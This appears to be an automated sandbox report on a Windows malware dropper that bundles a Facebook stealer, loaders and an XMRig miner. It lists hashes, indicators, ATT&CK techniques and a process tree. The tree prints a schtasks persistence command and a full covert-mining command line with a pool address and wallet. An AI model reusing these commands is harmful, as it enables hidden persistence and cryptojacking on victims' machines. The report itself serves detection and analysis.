fabookie | 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2024 13:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

keygen-step-4/PBrowFile28.exe
Size

1.8MB
MD5

8902f8193024fa4187ca1aad97675960
SHA1

37a4840c9657205544790c437698b54ca33bfd9d
SHA256

95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512

c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938
SSDEEP

49152:kqq2BEim5e9JoNLPxZVwNKaLsJi2lZZ6:xYOoNLJk1Yf

Score

10^/10

fabookie gcleaner onlylogger xmrig discovery loader miner spyware stealer

Malware Config

Extracted

Family

gcleaner

194.145.227.161

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral8/files/0x0008000000023c6e-53.dat	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Fabookie family
fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Onlylogger family
onlylogger
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

OnlyLogger payload 1 IoCs

resource	yara_rule
behavioral8/memory/2264-62-0x0000000000400000-0x0000000002B59000-memory.dmp	family_onlylogger

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral8/memory/5048-98-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-100-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-104-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-105-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-103-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-102-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-106-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-107-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-109-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-110-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral8/memory/5048-116-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	PBrowFile28.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	chrome3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	services64.exe

Executes dropped EXE 7 IoCs

pid	Process
4068	chrome3.exe
1696	PublicDwlBrowser188.exe
3412	2.exe
2264	setup.exe
2396	jhuuee.exe
4940	services64.exe
3696	sihost64.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
81	raw.githubusercontent.com
87	pastebin.com
89	pastebin.com
80	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4940 set thread context of 5048	4940	services64.exe	124

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
4548	2264	WerFault.exe	89
3076	2264	WerFault.exe	89
3732	2264	WerFault.exe	89
3336	2264	WerFault.exe	89
3056	2264	WerFault.exe	89
4844	2264	WerFault.exe	89
4220	2264	WerFault.exe	89
2928	2264	WerFault.exe	89

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PBrowFile28.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
944	schtasks.exe
4524	schtasks.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
4068	chrome3.exe
4940	services64.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe
5048	explorer.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	3412	2.exe
Token: SeDebugPrivilege	1696	PublicDwlBrowser188.exe
Token: SeDebugPrivilege	4068	chrome3.exe
Token: SeDebugPrivilege	4940	services64.exe
Token: SeLockMemoryPrivilege	5048	explorer.exe
Token: SeLockMemoryPrivilege	5048	explorer.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 1016 wrote to memory of 4068	1016	PBrowFile28.exe	86
PID 1016 wrote to memory of 4068	1016	PBrowFile28.exe	86
PID 1016 wrote to memory of 1696	1016	PBrowFile28.exe	87
PID 1016 wrote to memory of 1696	1016	PBrowFile28.exe	87
PID 1016 wrote to memory of 3412	1016	PBrowFile28.exe	88
PID 1016 wrote to memory of 3412	1016	PBrowFile28.exe	88
PID 1016 wrote to memory of 2264	1016	PBrowFile28.exe	89
PID 1016 wrote to memory of 2264	1016	PBrowFile28.exe	89
PID 1016 wrote to memory of 2264	1016	PBrowFile28.exe	89
PID 1016 wrote to memory of 2396	1016	PBrowFile28.exe	90
PID 1016 wrote to memory of 2396	1016	PBrowFile28.exe	90
PID 4068 wrote to memory of 816	4068	chrome3.exe	116
PID 4068 wrote to memory of 816	4068	chrome3.exe	116
PID 816 wrote to memory of 944	816	cmd.exe	118
PID 816 wrote to memory of 944	816	cmd.exe	118
PID 4068 wrote to memory of 4940	4068	chrome3.exe	119
PID 4068 wrote to memory of 4940	4068	chrome3.exe	119
PID 4940 wrote to memory of 220	4940	services64.exe	120
PID 4940 wrote to memory of 220	4940	services64.exe	120
PID 4940 wrote to memory of 3696	4940	services64.exe	122
PID 4940 wrote to memory of 3696	4940	services64.exe	122
PID 220 wrote to memory of 4524	220	cmd.exe	123
PID 220 wrote to memory of 4524	220	cmd.exe	123
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124
PID 4940 wrote to memory of 5048	4940	services64.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1016
- C:\Users\Admin\AppData\Local\Temp\chrome3.exe
  "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:816
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:944
- - C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:220
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4524
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:3696
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5048
- C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
  "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Users\Admin\AppData\Local\Temp\2.exe
  "C:\Users\Admin\AppData\Local\Temp\2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3412
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2264
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 788
    3⤵
    - Program crash
    PID:4548
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 824
    3⤵
    - Program crash
    PID:3076
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 800
    3⤵
    - Program crash
    PID:3732
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 944
    3⤵
    - Program crash
    PID:3336
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 960
    3⤵
    - Program crash
    PID:3056
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1132
    3⤵
    - Program crash
    PID:4844
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1140
    3⤵
    - Program crash
    PID:4220
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1208
    3⤵
    - Program crash
    PID:2928
- C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
  2⤵
  - Executes dropped EXE
  PID:2396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2264 -ip 2264
1⤵
PID:2812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2264 -ip 2264
1⤵
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2264 -ip 2264
1⤵
PID:1960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2264 -ip 2264
1⤵
PID:2240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2264 -ip 2264
1⤵
PID:908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2264 -ip 2264
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2264 -ip 2264
1⤵
PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2264 -ip 2264
1⤵
PID:2436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2.exe

Filesize
8KB

MD5
a5bace3c3c2fa1cb766775746a046594

SHA1
9998cad5ba39e0be94347fcd2a2affd0c0a25930

SHA256
617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6

SHA512
66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

Download Submit
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

Filesize
101KB

MD5
13e802bd360e44591d7d23036ce1fd33

SHA1
091a58503734848a4716382862526859299ef345

SHA256
e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b

SHA512
8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome3.exe

Filesize
43KB

MD5
4b0d49f7c8712d7a0d44306309f2e962

SHA1
5f0a2536f215babccf860c7ccdeaf7055bb59cad

SHA256
f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60

SHA512
50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

Filesize
1.3MB

MD5
f9be28007149d38c6ccb7a7ab1fcf7e5

SHA1
eba6ac68efa579c97da96494cde7ce063579d168

SHA256
5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914

SHA512
8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
314KB

MD5
0ebb4afbb726f3ca17896a0274b78290

SHA1
b543a593cfa0cc84b6af0457ccdc27c1b42ea622

SHA256
2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2

SHA512
284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
9910203407b2605107587e954081c575

SHA1
8037bfb3b779fbbb3273df4f5c63d15b9589ce95

SHA256
07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49

SHA512
ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

Download Submit
memory/1016-1-0x00000000009A0000-0x0000000000B76000-memory.dmp

Filesize
1.8MB

Download
memory/1016-0-0x0000000074F9E000-0x0000000074F9F000-memory.dmp

Filesize
4KB

Download
memory/1696-38-0x0000000000DE0000-0x0000000000E00000-memory.dmp

Filesize
128KB

Download
memory/1696-45-0x00000000016A0000-0x00000000016BA000-memory.dmp

Filesize
104KB

Download
memory/1696-49-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp

Filesize
10.8MB

Download
memory/1696-60-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp

Filesize
10.8MB

Download
memory/2264-62-0x0000000000400000-0x0000000002B59000-memory.dmp

Filesize
39.3MB

Download
memory/3412-39-0x00000000004F0000-0x00000000004F8000-memory.dmp

Filesize
32KB

Download
memory/3696-96-0x0000000000B90000-0x0000000000B96000-memory.dmp

Filesize
24KB

Download
memory/4068-65-0x00000000011F0000-0x00000000011FE000-memory.dmp

Filesize
56KB

Download
memory/4068-61-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp

Filesize
8KB

Download
memory/4068-66-0x0000000001240000-0x0000000001252000-memory.dmp

Filesize
72KB

Download
memory/4068-15-0x0000000000840000-0x0000000000850000-memory.dmp

Filesize
64KB

Download
memory/4068-13-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp

Filesize
8KB

Download
memory/5048-105-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-101-0x00000000029B0000-0x00000000029D0000-memory.dmp

Filesize
128KB

Download
memory/5048-100-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-104-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-98-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-103-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-102-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-106-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-107-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-109-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-110-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/5048-116-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download